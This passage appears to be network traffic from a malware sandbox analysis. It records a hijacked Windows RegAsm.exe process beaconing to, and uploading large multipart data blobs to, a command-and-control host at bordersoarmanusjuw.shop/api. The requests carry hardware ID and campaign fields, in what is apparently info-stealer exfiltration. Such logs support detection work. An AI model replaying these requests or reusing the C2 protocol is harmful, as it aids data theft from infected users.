                                                                                                                                            2024-04-21 13:31:27 UTC15331OUTData Raw: d9 8d ed 57 07 5e 7a 18 9d 92 74 4a a1 b3 a0 f5 ee 2d 1f 56 47 47 4f ad a3 40 0e 60 d7 3d ff e6 bd e2 3b 1f e1 c4 76 35 a6 8f fc 5a 7f 96 8b 34 d8 70 3f 02 48 2a c4 f6 3f 1b 59 bb ed dc 05 c4 05 10 b2 27 2f cf 9a fa 41 a5 77 b1 3e cf d2 a5 ef 38 58 65 38 67 1b 0b 0b c3 b6 a3 d5 51 21 97 bf d4 1c 96 52 a2 7b 71 4a 12 28 e8 68 43 1e 5e ec 82 69 6e 1b a3 51 98 c1 0e 91 c3 5e ac 49 c1 34 eb 17 5a 86 06 3d d3 e0 e4 50 6f 3c fb 57 a2 39 34 ec 0e 35 65 2a fb 04 df 6a 33 e0 d9 8e d6 9a 8a 6a 8a 51 b5 36 3a 62 b5 2f 10 dd 41 af 5f f3 5c 40 7a b0 21 f3 32 7c 5b ff d6 4f 62 02 4e c0 1b af 2a 7b d4 80 ef e9 bc 46 16 ba 52 33 11 e6 65 9b fa 4b da e6 55 b4 1b 8e f0 29 42 d2 97 1a f9 a9 cb cb 32 9f 88 d2 b8 49 65 b2 50 07 a0 18 f2 ca 04 92 89 17 48 42 94 fd 02 79 6f 6b
                                                                                                                                            Data Ascii: W^ztJ-VGGO@`=;v5Z4p?H*?Y'/Aw>8Xe8gQ!R{qJ(hC^inQ^I4Z=Po<W945e*j3jQ6:b/A_\@z!2|[ObN*{FR3eKU)B2IePHByok
                                                                                                                                            2024-04-21 13:31:27 UTC15331OUTData Raw: 79 72 84 b0 72 d8 61 ed 40 9a 6a cc ec c5 b2 c3 f3 ad 93 55 db ed 9e ee 8e 21 6d b9 ec bb ae af de 65 eb 26 07 6c 1f f0 92 9d 7c b6 10 b1 6a 3b 88 1a 31 48 38 77 46 ea 49 ee 42 fe 5b 43 ff 1a ce c1 0d 6d 0b bf 9e ec 32 86 32 61 3a 6e eb f7 d3 ef 56 1d f6 d6 b2 19 b9 29 ab 01 0f 85 55 25 c6 b4 65 c2 e1 9e 62 89 cf 22 e9 72 af 6a 10 81 94 80 bb 66 1a eb d1 c6 98 23 2b 1a 43 0c 0f b8 80 58 4a a4 1c 1f 4c 4e 8f a4 33 b7 9e ba 99 43 b0 60 b4 8e b2 3f f3 d1 26 62 f7 ac a5 a3 51 74 67 76 2f ca 4c fc bc 4f fb 79 3a 1d 4e ab af 4c f1 b4 37 f5 b0 8e d4 e6 c4 ee 18 e8 81 22 8f b0 1f 7b 78 f6 42 a7 29 87 74 96 07 82 58 bd d1 4c 03 99 0f 17 75 dd 1e 89 e7 33 62 5b 9c 69 88 10 df 35 db 68 c7 f1 c2 60 96 f0 2e 7c f2 56 e3 21 52 93 78 04 9d 15 a0 9c e1 98 cc 32 a5 b9 ca
                                                                                                                                            Data Ascii: yrra@jU!me&l|j;1H8wFIB[Cm22a:nV)U%eb"rjf#+CXJLN3C`?&bQtgv/LOy:NL7"{xB)tXLu3b[i5h`.|V!Rx2
                                                                                                                                            2024-04-21 13:31:29 UTC824INHTTP/1.1 200 OK
                                                                                                                                            Date: Sun, 21 Apr 2024 13:31:29 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=kdrqkph8e5pneccuef64j0qrpb; expires=Thu, 15-Aug-2024 07:18:08 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=biVAmSU6HO6LNj9leIBbFYoVEAfFz2BH4dqFs93%2FfL%2Btt%2BzXQ%2B%2F1ZaHjBGVGyZdhTAvR9kqlnN1vhfp9ccpDRxDpJXwd%2FqTrKKsWA8INpdEnL%2BPf8%2FuswlZhsVM%2BUTAtRQMkSDVcm1mG5w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 877dbc0a2aaf184b-ATL
                                                                                                                                            alt-svc: h3=":443"; ma=86400


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            25192.168.2.449765172.67.189.664435900C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-04-21 13:31:28 UTC290OUTPOST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 585358
                                                                                                                                            Host: bordersoarmanusjuw.shop
                                                                                                                                            2024-04-21 13:31:28 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 37 39 42 32 46 46 31 41 46 41 37 34 45 30 38 42 33 39 39 35 32 33 42 36 32 37 33 46 42 46 41 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62
                                                                                                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"879B2FF1AFA74E08B399523B6273FBFA--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
                                                                                                                                            2024-04-21 13:31:28 UTC15331OUTData Raw: 3a f3 62 84 75 06 81 7a a0 c3 75 97 6b 5a 40 57 0f d7 38 70 ec fe 7b e4 20 d4 10 62 ba 64 40 3d 02 40 22 02 b6 9d 87 18 47 a5 c1 3e 38 20 32 04 c3 fb 4b ae ce 81 3e b6 0f b5 6e 1e ca 3e 2e 08 6d e1 43 df 64 3e 43 c0 d7 d5 0a 25 c1 fb 43 e4 ca 2e 7e 10 af cb bc 17 8e 21 ec 37 a9 a4 21 b5 ac 41 d8 3e 8e 9b 13 63 6a ed be 36 52 fa 51 08 43 36 47 9d 59 b5 8e 14 ac ad 26 9e fe dd 6e c3 fe ea 2c 13 16 18 a7 49 ad 80 8e e6 73 03 9f 36 f6 77 37 0f 9e 1b af 71 fd 74 9d ad 84 f9 26 9d b9 e8 6a b9 75 f9 29 dd d0 84 bd 86 23 77 1c 64 28 24 46 26 1a 16 5b 51 9f ca 5d 06 be fb a8 47 91 01 5c 47 dd 8b 5c d8 ca 25 ea a7 9b 06 97 c8 5a 43 a4 91 86 ba 2f 49 5f 38 23 06 2e 6f f5 1f df f5 b3 69 49 8e 30 09 0b ed c5 9c da 4f 45 24 96 84 7c f9 92 bd 57 a6 68 83 2b 94 b3 99 16
                                                                                                                                            Data Ascii: :buzukZ@W8p{ bd@=@"G>8 2K>n>.mCd>C%C.~!7!A>cj6RQC6GY&n,Is6w7qt&ju)#wd($F&[Q]G\G\%ZC/I_8#.oiI0OE$|Wh+
                                                                                                                                            2024-04-21 13:31:28 UTC15331OUTData Raw: 5f 95 0d 79 f0 3c c1 84 c5 e4 26 47 0a 1d d3 ed 63 88 6f 7f f6 fa 5d 01 c2 73 41 31 cd ff e0 75 76 ac 17 ea 6c 60 75 75 a9 53 d1 72 23 b5 b1 60 39 95 4a f8 25 35 9c 61 12 28 7d 02 de 30 08 37 89 23 78 63 48 a8 85 63 37 9b a3 b4 67 22 94 3a 4c e0 80 36 fd 98 d5 6f e8 18 6f 5f ae 7d 25 da d1 7b 45 4e 59 bb 48 87 f8 ee 23 cd 0d 3f 8d 22 f5 f2 db 7a f3 b5 e5 2a 6d 65 7a 5b 8c ef 0c 1b bc b4 b4 e0 26 fa b8 83 eb 59 12 3b a7 35 53 d3 75 39 60 79 62 b0 b8 78 ab f3 67 b6 a0 e1 c0 ad 3f a7 04 7c 3b 9a f3 9b 88 26 25 9f a0 97 ac 26 69 70 ac 17 9e fd 26 c5 ae bf 59 4e 78 29 87 8a 7c 58 9a 9c 66 1a b3 71 66 ee a3 2e 97 01 37 c5 a1 5b 3f 82 74 2e 90 ea 11 9a 50 ff e4 26 ff bc be a2 47 bf de 58 af 80 4b 5f 89 f4 43 e1 a6 4d 61 25 38 14 4b a4 eb d1 97 55 85 e4 fb 75 06
                                                                                                                                            Data Ascii: _y<&Gco]sA1uvl`uuSr#`9J%5a(}07#xcHc7g":L6oo_}%{ENYH#?"z*mez[&Y;5Su9`ybxg?|;&%&ip&YNx)|Xfqf.7[?t.P&GXK_CMa%8KUu
                                                                                                                                            2024-04-21 13:31:28 UTC15331OUTData Raw: d7 54 bd d3 41 2d 4c 73 2b c7 dc b9 48 f8 69 9e 20 a1 d3 a3 a5 a2 7e 0a 14 96 18 c5 45 3f 50 ff 8e a5 5a fa 27 fc e1 90 54 95 66 6f 54 4f 4d 8c 28 f8 75 e2 72 8e 1a a1 11 d3 95 a8 c7 fc 06 88 de 1b 72 54 68 cb 3b ef cb 11 b6 67 5b 68 34 37 4f 68 49 05 7a e7 d0 65 8b 04 8b b4 1c 51 b2 03 a5 c0 cf 7a 28 5a 74 77 95 00 80 7b eb e3 82 be 47 d0 7d 57 48 cb 7c aa f2 48 b2 44 aa e3 8d 05 ba 17 c0 b6 eb 12 8c 28 a5 b4 85 a0 60 58 e0 9b 07 47 6f ff 60 1d 00 ca e1 67 05 01 aa 35 3b ee 7a 4d b3 d2 d4 c3 6f ed 1e 0b 9a b5 9b 03 10 39 61 2b 4f 18 9e 6c ae 2b 0e 37 74 ba d7 d0 20 54 1f 93 ef bc fe 05 5f fd ed 0f c8 b3 40 a6 4f ae 84 54 98 bb 56 f4 5d ef b0 f6 ca 89 5a bc 98 98 ff eb be 60 12 60 93 18 f5 ec b9 b9 2b 35 09 0f 82 1d a7 77 fd c9 39 9a 2b 68 12 21 af 64 01
                                                                                                                                            Data Ascii: TA-Ls+Hi ~E?PZ'TfoTOM(urrTh;g[h47OhIzeQz(Ztw{G}WH|HD(`XGo`g5;zMo9a+Ol+7t T_@OTV]Z``+5w9+h!d
                                                                                                                                            2024-04-21 13:31:28 UTC15331OUTData Raw: 40 79 d0 d7 64 80 f1 fd 10 d6 f9 1c cc 1d 19 8f bb d8 98 17 24 f8 eb b3 05 a6 d0 df 4d 34 2a 36 93 e4 ac d0 a7 74 10 59 4e b6 a1 06 a4 a8 50 10 91 92 d0 2d d3 49 99 40 e6 b2 c4 08 f5 20 82 7f 66 a3 d9 9b 90 04 c5 ff ef 70 77 b0 75 7c a9 f5 2c b1 4e 36 3a 18 41 0e 5c af f1 ec 5c b1 3a cf 37 89 1b f4 54 4c a8 42 f6 9e 74 7a 1a 45 3a 18 17 3e c0 eb 4d 97 58 7d 87 e3 60 83 50 32 f9 86 4b 7e fd ac e4 9e c3 76 a0 90 62 0d e1 c6 ea 6c 5c bf 97 a2 c3 af 48 60 da c7 ae 26 1e 99 9e f0 08 50 1b a7 28 af 94 9d 24 c4 85 93 49 da fb 8e db e7 06 ec cb ae 3c 6c cb 32 e1 c0 18 22 c1 50 38 ea f2 78 29 0c 4f 36 9e df 25 d4 c4 57 78 54 5e 79 a5 a3 5a 2d 4a 76 b1 7b 59 2c 3a a6 47 c2 72 93 36 05 7b 7a d6 25 6b d1 d3 4a 5f 98 f2 4e 21 48 60 40 bc d4 3c a6 fb bf 42 c1 f1 54 43
                                                                                                                                            Data Ascii: @yd$M4*6tYNP-I@ fpwu|,N6:A\\:7TLBtzE:>MX}`P2K~vbl\H`&P($I<l2"P8x)O6%WxT^yZ-Jv{Y,:Gr6{z%kJ_N!H`@<BTC
                                                                                                                                            2024-04-21 13:31:28 UTC15331OUTData Raw: 67 f0 a0 b8 c5 88 83 05 de ab dd 75 04 8a 59 a2 70 e5 84 dc df ae 5a 1d 4a a9 31 91 97 58 39 44 dc 19 62 aa fb a5 f8 fb 2b 00 42 b6 c9 88 7c 56 a5 b8 48 b0 3b 83 29 89 57 c4 ea 68 4d 9a 34 e2 97 ee fa 6a 39 ce 94 b3 ad 79 a3 fc 8f 6a 64 f2 01 12 9d f6 fd 5e 92 21 2e 25 5f eb d6 5e 36 49 3c 5e 0f ec 93 7a 55 54 d8 6c 56 47 d8 3a 18 39 6f 2b 84 8a 3b f5 ca 6e ac 46 93 df 6a 00 bb 2e d3 42 bf 83 c2 5c 8f 4f af 67 3b 24 81 33 23 ca 13 bc 3d 0c db f8 86 0d aa 0c ef ad a7 cd 20 39 4b cf 35 f4 98 43 b4 fc 5f b1 ed 62 67 49 4d a0 e4 21 d1 6c df 8e d5 79 b3 7b c8 76 d3 c6 0d 32 bc 25 9a 26 db cb c9 a8 bb 01 5c 71 06 c4 32 af b8 3e 18 11 b0 d8 8b f8 bb 4a 9e 7a c7 c5 29 fe 32 ab 56 43 27 7a 83 ac c1 b6 91 93 db 8b fb 40 b7 79 11 ed 7d d5 c0 60 9f 0e 58 ef f8 9a 03
                                                                                                                                            Data Ascii: guYpZJ1X9Db+B|VH;)WhM4j9yjd^!.%_^6I<^zUTlVG:9o+;nFj.B\Og;$3#= 9K5C_bgIM!ly{v2%&\q2>Jz)2VC'z@y}`X
                                                                                                                                            2024-04-21 13:31:28 UTC15331OUTData Raw: f9 8a 3d a4 55 a5 e8 50 f1 30 33 67 fe f8 16 d6 1d 92 6b 45 b7 1a 09 9e 0e 56 e4 c8 1b 20 d4 62 62 db c7 16 90 eb 6d 1b 39 f3 04 0b f3 f0 37 93 00 15 0d 23 2e 96 76 74 60 a4 99 37 f3 35 32 99 54 74 7c 1a 74 30 27 b7 66 a7 3b 3c cd 40 53 84 44 2c 57 b8 93 93 ea b3 b6 71 30 95 35 cd d9 46 df 0b 88 14 53 3a 01 41 cc 6f 83 ec ef b9 e2 bf 5b f8 06 de 67 da a3 2c f0 8d bf 70 13 12 a7 c6 6a a4 00 9e 92 1e 15 1c ff 51 85 d6 61 6e 16 69 26 cc 07 c2 6a f3 ba 75 79 3f 6b f4 10 a7 f4 33 2c 88 69 33 ee d9 75 d1 f1 42 ec bb 67 fa 23 07 55 be eb fc 82 8b 90 9a 1d 7d ec 68 8c 0f 8a 92 85 2d 82 f7 4c a8 10 f8 70 91 fd 3b fb 4c 17 3a fe 30 c5 44 b6 fe b4 53 1c 6b d7 75 08 21 74 f1 0a 56 f6 be ca 3e 50 d2 6a ad 18 7d 58 45 c4 2e 73 be 7f 97 2b 46 98 bf 4a 15 d1 fc 12 4c 37
                                                                                                                                            Data Ascii: =UP03gkEV bbm97#.vt`752Tt|t0'f;<@SD,Wq05FS:Ao[g,pjQani&juy?k3,i3uBg#U}h-Lp;L:0DSku!tV>Pj}XE.s+FJL7
                                                                                                                                            2024-04-21 13:31:28 UTC15331OUTData Raw: d4 5e 2d 58 c0 21 e5 02 09 f0 5b a1 4f e1 24 f5 7f e3 eb 9a 36 a1 ed db d3 31 29 67 b1 0b 6f 6d 67 f9 21 cb 4b 8c 77 18 3e d4 cc b5 e5 8b 19 bc 1a b0 37 4b a3 26 4d 42 3e 9c 67 a6 d3 e5 53 e9 b1 7c 62 1d c7 4b 9d 1c 3b be a7 7d 5c 55 ed f8 f9 24 3c 92 c6 83 63 df 2f e9 01 1b 3e 13 6d 22 9d 47 87 e4 21 28 e8 51 a8 b7 fa 61 6e 43 0c 55 78 9e 9a 86 b7 bc 67 22 be 76 26 59 a4 e9 05 de 28 ed e9 8e 2c 9e 4a e5 df ec 91 3e 59 d6 18 44 2f db 8d fc 80 52 2a ae 9f 21 a9 f1 9f 71 25 32 09 50 9a 89 51 14 1d 19 6e 50 aa 51 e0 7d 2c d9 34 d1 b4 c9 95 35 69 68 bf ff 70 cb dc 80 a4 22 d1 21 46 d1 3f a5 8d 83 98 fc f9 17 17 4e 6e b8 3d 3c ae 5c e6 f2 5b 8a 8c ab 95 35 27 ab cc c8 2c 33 84 4d a3 a0 2b c0 72 b4 32 f4 8d 61 32 0b ed 6b aa 98 17 94 b7 38 2c 0e 7e 07 63 a6 2f
                                                                                                                                            Data Ascii: ^-X![O$61)gomg!Kw>7K&MB>gS|bK;}\U$<c/>m"G!(QanCUxg"v&Y(,J>YD/R*!q%2PQnPQ},45ihp"!F?Nn=<\[5',3M+r2a2k8,~c/
                                                                                                                                            2024-04-21 13:31:28 UTC15331OUTData Raw: 56 a5 6e 99 ee e1 11 9e 43 c0 ba 6f a9 64 92 33 da 42 32 21 f9 ad 15 ff d7 8a 3d 57 28 54 26 b8 3d ac 2d 0a 9a da 70 39 18 d3 8a da c9 16 98 c7 f7 24 b9 23 84 5b 49 3f 77 e6 bc 56 84 82 41 68 cc c6 0d 49 e2 30 0f 32 a7 d2 6f b2 61 c8 11 19 13 f2 89 a0 ce 31 9e ed a6 e1 06 23 ce 39 13 46 6a 22 a3 b0 c0 0a df de 2a d4 61 38 6c b6 c7 69 6e 8e c7 28 55 ad e5 a1 2b 44 cb 09 ce db 4d dc 44 cc 46 ef 66 99 42 ef 7a 3c 55 90 a1 11 1d 94 21 a2 73 1d d7 75 09 0f 48 83 45 bb 88 ce 0a 94 4b 79 69 8f 52 61 59 8b 4c de 5a 8d 0a b7 5d ad 31 53 6f 1d 9e 73 a1 c7 9c 08 59 91 61 18 f9 89 89 8a ba bf 4a 4e 4f c8 ad eb 55 32 50 43 53 23 a9 57 ce 0c 8a 27 9b 17 6f d8 ea 98 2d 5c ec 62 7b c0 5e fa c9 dc 96 a4 00 c6 99 a3 64 1c 70 cd 6d 9a 58 53 bc 7b ef 57 68 f2 d2 44 82 a6 7a
                                                                                                                                            Data Ascii: VnCod3B2!=W(T&=-p9$#[I?wVAhI02oa1#9Fj"*a8lin(U+DMDFfBz<U!suHEKyiRaYLZ]1SosYaJNOU2PCS#W'o-\b{^dpmXS{WhDz
                                                                                                                                            2024-04-21 13:31:28 UTC15331OUTData Raw: 28 02 41 11 66 c7 a7 8a fb 2d 05 3b d4 c1 5a 3e 2b 75 a4 7f 89 e0 37 f7 39 01 d5 e8 c4 c7 3d c4 72 82 c2 d5 43 fb b7 7e 0f 8f 36 dc 54 60 5e 9e 5c d8 31 77 63 e8 a3 4f 4f e8 fc c4 44 60 ea 34 67 b4 c1 77 80 36 18 58 b5 d9 f6 2c c3 99 95 56 2a f8 71 7e e8 46 c6 c7 d5 ae 7b fd c5 a5 c6 be 03 c5 01 2d be a4 85 8d e1 bb 51 4f e6 6c 67 c2 ca fe 8e a4 13 f2 ed a7 c2 42 12 ba 2b 93 6e 39 8c e7 55 8d 62 b5 47 ef 6a 59 f1 ad c5 9d b8 f9 21 b7 7a f6 b1 4f b4 2d cc 53 be 22 00 69 47 f3 5f fd 9b 07 c6 d7 4a b1 d7 55 dc 0e d1 2e 24 f3 eb 74 a9 d5 3d 6a ee 42 3d 92 7c 78 f2 be 0d f4 92 e7 2b 9a b8 c3 69 e6 8e 3b fc ae 99 35 56 fc 8e 7b fc ce ff ed d7 cf f9 a5 1d f5 a5 7c a5 e8 98 2b c7 15 91 51 ab 3d ff f2 f0 d2 bb 25 c7 e9 b3 a9 35 b5 ef cb e6 93 75 61 a6 fc f2 e6 2e
                                                                                                                                            Data Ascii: (Af-;Z>+u79=rC~6T`^\1wcOOD`4gw6X,V*q~F{-QOlgB+n9UbGjY!zO-S"iG_JU.$t=jB=|x+i;5V{|+Q=%5ua.
                                                                                                                                            2024-04-21 13:31:29 UTC816INHTTP/1.1 200 OK
                                                                                                                                            Date: Sun, 21 Apr 2024 13:31:29 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=avrgn4slqr7rp25l266m7idng1; expires=Thu, 15-Aug-2024 07:18:08 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FStwYrES1uS5i%2F1el8zTpNOTXm%2BwnrYnjXtcb04N33mnK%2FZ5m5A35fAd2inTNHvXkMPS8oBJD%2BC09agdP7iXxkEh9OtoQBqL3OYaaitxe4rrjZ7P3y%2BYfvRozLMTwD0MUJp2pqJTwHd3oQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 877dbc0c588e0d06-ATL
                                                                                                                                            alt-svc: h3=":443"; ma=86400


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            26192.168.2.449766172.67.189.664432128C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-04-21 13:31:33 UTC270OUTPOST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 8
                                                                                                                                            Host: bordersoarmanusjuw.shop
                                                                                                                                            2024-04-21 13:31:33 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                            Data Ascii: act=life
                                                                                                                                            2024-04-21 13:31:33 UTC812INHTTP/1.1 200 OK
                                                                                                                                            Date: Sun, 21 Apr 2024 13:31:33 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=dka8ok65vnmmtn6afgre077o56; expires=Thu, 15-Aug-2024 07:18:12 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ACgYRJFrr1I49rpxYQHmPIRc5q3GfCjNNpLWVv7IsXq1pCSGJtiX2IXkvZzmKAvwrN5eX45WebogDaMoKKBxwlabHxm7xs4kkJ6PDykXO%2BB%2BUCZs6G8dzY5oZde%2FD6WsA51ag3N7AB63fQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 877dbc2e3d0e7b94-ATL
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            2024-04-21 13:31:33 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                            Data Ascii: 2ok
                                                                                                                                            2024-04-21 13:31:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                            Data Ascii: 0


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            27192.168.2.449767172.67.189.664432128C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-04-21 13:31:34 UTC271OUTPOST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 49
                                                                                                                                            Host: bordersoarmanusjuw.shop
                                                                                                                                            2024-04-21 13:31:34 UTC49OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 38 4e 67 43 6c 2d 2d 26 6a 3d 64 65 66 61 75 6c 74
                                                                                                                                            Data Ascii: act=recive_message&ver=4.0&lid=H8NgCl--&j=default
                                                                                                                                            2024-04-21 13:31:34 UTC820INHTTP/1.1 200 OK
                                                                                                                                            Date: Sun, 21 Apr 2024 13:31:34 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=3382eb0qgob4ib8bc6m34trkml; expires=Thu, 15-Aug-2024 07:18:13 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Zu%2BtX9mpYvZmD8ZP3XoGs2%2BD9hwJ4gOsx1qlGUHhgrEhfXoejSj%2Fkz8rU4C1Ov%2F4cVrpaZSBP8as%2BHCF8vKphGY968gyXSRlMumgHBf3uuEDqddr7wl1fnSDD8LJYWo5hxrgRuea%2Fyv%2Bsg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 877dbc32fd864575-ATL
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            2024-04-21 13:31:34 UTC549INData Raw: 35 30 30 0d 0a 6d 4b 49 38 63 30 4c 56 41 66 6a 61 64 72 72 49 4e 61 69 31 47 6a 38 4b 4b 4a 41 7a 46 52 39 57 66 73 5a 4f 6c 72 43 5a 63 4f 33 6a 71 44 56 52 4e 50 63 37 32 4f 35 61 73 4d 45 58 32 39 41 34 42 53 70 63 34 6b 5a 77 4d 31 78 33 35 43 2f 79 6b 71 4e 51 69 2f 6e 4f 54 78 5a 75 33 77 6a 61 74 77 36 59 38 68 58 7a 76 78 4e 45 41 43 47 5a 45 58 42 78 64 45 54 6d 62 4f 48 56 2b 78 57 56 37 4d 64 53 41 43 75 36 62 37 69 33 45 38 36 70 57 4d 6e 47 63 52 46 6a 52 37 49 66 48 78 5a 66 58 4b 4d 30 74 49 71 35 55 71 44 39 31 6c 30 2b 49 36 5a 71 32 76 5a 38 73 38 45 58 7a 63 45 34 42 53 6f 4b 7a 42 46 6c 66 69 51 66 71 7a 33 4b 6b 71 4d 4c 73 62 72 4c 53 42 59 77 74 48 57 52 74 52 6a 4a 6c 42 65 53 67 79 6f 50 4f 68 69 67 54 6a 63 56 58 77 50 4d 52 38
                                                                                                                                            Data Ascii: 500mKI8c0LVAfjadrrINai1Gj8KKJAzFR9WfsZOlrCZcO3jqDVRNPc72O5asMEX29A4BSpc4kZwM1x35C/ykqNQi/nOTxZu3wjatw6Y8hXzvxNEACGZEXBxdETmbOHV+xWV7MdSACu6b7i3E86pWMnGcRFjR7IfHxZfXKM0tIq5UqD91l0+I6Zq2vZ8s8EXzcE4BSoKzBFlfiQfqz3KkqMLsbrLSBYwtHWRtRjJlBeSgyoPOhigTjcVXwPMR8
